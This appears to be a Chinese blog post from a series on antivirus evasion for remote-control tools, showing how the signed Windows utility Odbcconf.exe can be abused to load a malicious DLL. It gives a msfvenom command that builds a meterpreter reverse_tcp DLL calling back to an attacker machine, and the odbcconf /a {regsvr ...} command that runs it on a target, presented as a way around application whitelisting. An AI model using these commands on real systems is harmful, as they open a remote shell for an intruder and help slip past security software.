【免殺篇】遠控免殺專題(59)-白名單Odbcconf.exe執行payload


當你的才華

還撐不起你的野心時

那你就應該靜下心來學習


目錄

0x01 Odbcconf.exe介紹

0x02 利用Odbcconf.exe執行payload法


0x01 Odbcconf.exe介紹

Odbcconf.exe是一個命令行工具,可讓您配置ODBC驅動程序和數據源名稱(微軟官方文檔https://docs.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver15)。

Odbcconf.exe在windows中的的一般路徑爲C:\Windows\System32\odbcconf.exe  C:\Windows\SysWOW64\odbcconf.exe

通過文檔可發現有兩種方式來加載dll,/A和/F

 

0x02 利用Odbcconf.exe執行payload法

攻擊機:kali    ip地址:192.168.10.130

靶機:win7     ip地址:192.168.10.135

使用msfvenom生成shellcode,注意生成的是dll格式

msfvenom --platform windows -p windows/x64/meterpreter/reverse_tcp lhost=192.168.10.130 lport=4444 -f dll > hacker.dll

設置監聽:

靶機運行payload:

odbcconf.exe /a {regsvr C:\Users\Administrator\Desktop\hacker.dll}

成功上線:

這個也被殺軟盯上了,行爲檢測預警。

 

參考鏈接:

基於白名單Odbcconf執行payload:https://micro8.github.io/Micro8-HTML/Chapter1/81-90/82_%E5%9F%BA%E4%BA%8E%E7%99%BD%E5%90%8D%E5%8D%95Odbcconf%E6%89%A7%E8%A1%8Cpayload%E7%AC%AC%E5%8D%81%E4%BA%8C%E5%AD%A3.html

 


雖然我們生活在陰溝裏,但依然有人仰望星空!


 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章